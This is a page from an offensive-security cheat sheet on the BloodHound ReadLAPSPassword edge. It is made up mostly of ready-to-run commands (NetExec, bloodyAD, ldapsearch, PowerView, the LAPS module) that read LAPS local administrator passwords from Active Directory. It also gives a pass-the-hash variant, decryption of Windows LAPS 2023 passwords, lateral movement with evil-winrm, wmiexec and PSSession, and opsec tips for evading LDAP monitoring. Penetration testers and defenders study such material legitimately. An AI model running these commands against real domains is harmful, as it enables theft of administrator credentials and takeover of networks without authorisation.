🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / ReadLAPSPassword

ReadLAPSPassword

Source principal can read the local administrator password stored in LAPS for the target computer.

Applies to: User/Group/Computer β†’ Computer

Linux Abuse

NetExec

# Legacy LAPS (ms-Mcs-AdmPwd)
netexec ldap <dc-ip> -u <username> -p '<password>' -d <domain> --module laps

# Windows LAPS 2023 (msLAPS-Password)
netexec ldap <dc-ip> -u <username> -p '<password>' -d <domain> --module laps --laps-computer <target-computer>

bloodyAD

# Legacy LAPS
bloodyAD -u <username> -p '<password>' -d <domain> --host <dc-ip> get search \
  --filter '(ms-mcs-admpwdexpirationtime=*)' \
  --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime

# Windows LAPS 2023
bloodyAD -u <username> -p '<password>' -d <domain> --host <dc-ip> get search \
  --filter '(objectClass=computer)' \
  --attr msLAPS-Password,msLAPS-EncryptedPassword

ldapsearch

ldapsearch -x -H ldap://<dc-ip> -D '<username>@<domain>' -w '<password>' \
  -b 'DC=<domain>,DC=<tld>' \
  '(ms-mcs-admpwdexpirationtime=*)' ms-mcs-admpwd ms-mcs-admpwdexpirationtime

Pass-the-Hash variant (bloodyAD)

bloodyAD -u <username> -H '<ntlm-hash>' -d <domain> --host <dc-ip> get search \
  --filter '(ms-mcs-admpwdexpirationtime=*)' \
  --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime

Decrypt Windows LAPS 2023 encrypted attribute

# lapsv2decrypt (dotnet tool)
# https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
lapsv2decrypt <base64-encrypted-value>

Windows Abuse

PowerView

# Legacy LAPS
Get-DomainComputer <target-computer> -Properties cn,ms-mcs-admpwd,ms-mcs-admpwdexpirationtime

# All LAPS-enabled computers
Get-DomainComputer -Filter '(ms-mcs-admpwdexpirationtime=*)' -Properties cn,ms-mcs-admpwd

Microsoft LAPS PowerShell Module (Windows LAPS 2023)

Get-LapsADPassword "<target-computer>" -AsPlainText

Native AD Module

Get-ADComputer <target-computer> -Properties ms-Mcs-AdmPwd | Select-Object Name,ms-Mcs-AdmPwd

After retrieving password β€” lateral movement

# PSSession with recovered LAPS cred
$laps = ConvertTo-SecureString '<laps-password>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('.\Administrator', $laps)
Enter-PSSession -ComputerName <target-computer> -Credential $cred

# Linux: evil-winrm or wmiexec with LAPS password
evil-winrm -i <target-computer> -u Administrator -p '<laps-password>'
wmiexec.py 'Administrator:<laps-password>@<target-computer>'

Opsec

  • Reading LDAP attributes generates minimal noise; only detectable with LDAP query-level monitoring (e.g. Event ID 1644 or LDAP audit policy)
  • NetExec LAPS module may generate multiple LDAP binds β€” use -k with Kerberos for reduced credential noise
  • Windows LAPS 2023 encrypted passwords require the machine's AD computer account to decrypt; recovery from Linux requires lapsv2decrypt